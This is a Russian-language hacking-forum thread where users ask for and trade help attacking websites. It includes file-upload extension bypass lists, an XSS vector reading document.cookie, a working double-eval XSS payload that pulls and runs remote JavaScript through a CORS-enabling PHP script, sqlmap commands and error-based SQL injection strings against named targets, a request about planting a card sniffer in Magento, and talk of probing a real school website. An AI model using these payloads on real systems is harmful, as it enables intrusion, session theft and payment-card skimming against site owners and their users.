Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    459
    Likes Received:
    80
    Reputations:
    20
    Сама страница получяет такои ответ от сервера
    Code:
    0.72611600+15169956671.php.jpg
    А в итоге картинка на странице выводется так
    Code:
    000/013/927/000013927615.jpg
    Вопрос как все генерируется куда копать?
     
  2. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    135
    Likes Received:
    5
    Reputations:
    0
    Пробуйте подменить заголовок application-jpg
    Мне помогла статья
    https://habrahabr.ru/post/148999/
     
  3. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    135
    Likes Received:
    5
    Reputations:
    0
    Нашел " /.svn/entries" в этом файле могут быть захешированные пароли? Нашел только логины и странные обозначения и калаоги:
    Code:
    2015-11-19T15:19:41.000000Z
    345d3c642a73d0f3d463fb1aba2b3e74
    2015-11-19T14:39:32.670226Z
    
    launcher
    dir
    
    auth
    dir
    
    
     
  4. CoolHucker

    CoolHucker New Member

    Joined:
    12 Feb 2013
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Парни подскажите что можно сделать??!
    http://school2.perm.ru/administrator и таких дырок в каждой директории.Попробовал заюзать RFI LFI -безуспешно.
    P.S. Есть мысли ???может кто поможет в этом направлении?
     
  5. xaphan

    xaphan Member

    Joined:
    29 Jan 2018
    Messages:
    6
    Likes Received:
    10
    Reputations:
    4
    Там нет ни LFI, ни RFI. Я объясню почему так.
    В движке этого сайта не предусмотрен mod_rewrite, посему обращение в файлам происходит напрямую с помощью include(); "administrator" - это не файл, посему идёт обращение как в папке. Движок нам говорит, что он обращается к дефолтному index.php (то есть получается движок инклудит так: $_GET["path"]."/index.php"), а его там нет и происходит эта ошибка. Если вместо administrator ввести любое другое значение - реакция будет такая же.

    Данное можно трактовать как обычное раскрытие полного пути.
     
    crlf likes this.
  6. xaphan

    xaphan Member

    Joined:
    29 Jan 2018
    Messages:
    6
    Likes Received:
    10
    Reputations:
    4
    Вряд ли там будут какие-то данные в открытом виде. Это ж система контроля версий (как и гит). Можно попытаться получить все файлы с исходными кодами, вот посоветую этот скрипт.
     
    Muracha and crlf like this.
  7. CoolHucker

    CoolHucker New Member

    Joined:
    12 Feb 2013
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Спасибо за толкование.только неужели нельзя добраться до этого сайта никак?)
     
  8. panic.ker

    panic.ker Member

    Joined:
    25 Aug 2013
    Messages:
    90
    Likes Received:
    68
    Reputations:
    3
    Можно. Только за тебя это делать никто не будет. Это ветка вопросов по уязвимостям, а не по просьбам о взломе. Найди уязвимость, а растолковать и прояснить моменты-мы всегда за.
     
    ms13, auth_root and crlf like this.
  9. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    459
    Likes Received:
    80
    Reputations:
    20
    Посоветуите нормальныи большои список bypass extension для картинок
    Code:
    image.php.jpg
    image.jpg.php
    image.php;.jpg
    image.php%00.jpg
    image.php\0.jpg
    
     
  10. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    135
    Likes Received:
    5
    Reputations:
    0
    спасибо! помогло!
    А есть ли подобная вещь для WYSIWYG? заточенная на поиск загрузку файлов и тд
    dirb использую, dirbuster тоже но интересует более узкоспециализированное
     
  11. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,556
    Likes Received:
    398
    Reputations:
    230
    Magento Version 1.8.1.0
    Кто нить устанавливал снифер на эту версию? нужна помощь, в каком файле данные обрабатываются?
     
  12. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    459
    Likes Received:
    80
    Reputations:
    20
    Есть такои XSS вектор
    Code:
    <img name="alert(document.cookie)" onerror="eval(name)" src="" />
    Хочу сделать скриншот странице админа, нашел все необходимое, но скрипта очень много и засунуть в name="" получится но и за непонятнои фильтрации он никак не заработает, вариант такои засунуть в name="" что то типа инклуда и заинклудить весь .js, какие варианты инклуда есть типо
    Code:
    <img name="include(https:/host/script.js)" onerror="eval(name)" src="" />
    ЕСТЬ В JS ИНКЛУД ЧЕРЕЗ JS?
     
  13. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    106
    Likes Received:
    128
    Reputations:
    46
    HTML:
    <img name="xhr=new XMLHttpRequest();xhr.open('GET','https:/host/script.php',false);xhr.send();xhr.responseText" onerror="eval(eval(name))" src="" />
    нужно учитывать, что для кроссдоменных запросов от сервера должен приходить заголовок Access-Control-Allow-Origin, поэтому мы делаем запрос не прямиком к js файлу а к php, который отправляет нужный нам заголовок и содержимое js пейлоада

    содержимое самого php:
    PHP:
    <?php

    header
    ("Access-Control-Allow-Origin: *");
    echo 
    file_get_contents("payload.js");

    ?>
     
    #2253 dmax0fw, 6 Feb 2018
    Last edited: 6 Feb 2018
    cat1vo and crlf like this.
  14. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    459
    Likes Received:
    80
    Reputations:
    20
    Не хочет
    Code:
    <p><img name="xhr=new XMLHttpRequest();xhr.open('GET','http://host/images/s/s.php',false);xhr.send();xhr.responseText" onerror="eval(name)" /></p>
    s.php
    Code:
    <?php
    
    header("Access-Control-Allow-Origin: *");
    echo file_get_contents("alert.js");
    
    ?>
    http://host/images/s/s.php
    Code:
    alert("1");
     
  15. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    106
    Likes Received:
    128
    Reputations:
    46
    HTML:
    <p><img name="xhr=new XMLHttpRequest();xhr.open('GET','http://host/images/s/s.php',false);xhr.send();xhr.responseText" onerror="eval(name)" /></p>
    нужно дважды евалить
    HTML:
    <p><img name="xhr=new XMLHttpRequest();xhr.open('GET','http://host/images/s/s.php',false);xhr.send();xhr.responseText" onerror="eval(eval(name))" /></p>
    первый eval() выполняет код из name, то есть получает твой payload, а второй eval() уже выполняет данный payload
     
    Octavian likes this.
  16. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    394
    Likes Received:
    37
    Reputations:
    1
    Вопрос по SQL injection
    Code:
    GET /getaddr.cgi?heataccount=%5c
    [​IMG]
    Code:
     -u https://site.com/getaddr.cgi?heataccount=1%5c --dbs --no-cast --random-agent --dbms=mysql -v5 --level 2 --risk 3
    Code:
     -u https://site.com/getaddr.cgi?heataccount=%5c -p heataccount --dbs --no-cast --random-agent --level 2 --risk 3
    
    Не катит он тупа не видит
    Как раскрутить кто знает ?
     
  17. ms13

    ms13 Level 8

    Joined:
    19 Jun 2015
    Messages:
    2,189
    Likes Received:
    9,512
    Reputations:
    110
    Руками может?
     
    cat1vo likes this.
  18. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    251
    Likes Received:
    120
    Reputations:
    1
    level=5 попробуй в мапе, ну и руками error based вектор пробуй.
    Code:
    /getaddr.cgi?heataccount=1" and extractvalue(0x0a,concat(0x0a,(database()))--
    /getaddr.cgi?heataccount=1" and updatexml(NULL,concat(0x3a,(database())),Null)--
    
     
  19. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    263
    Likes Received:
    75
    Reputations:
    1
  20. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    263
    Likes Received:
    75
    Reputations:
    1
Loading...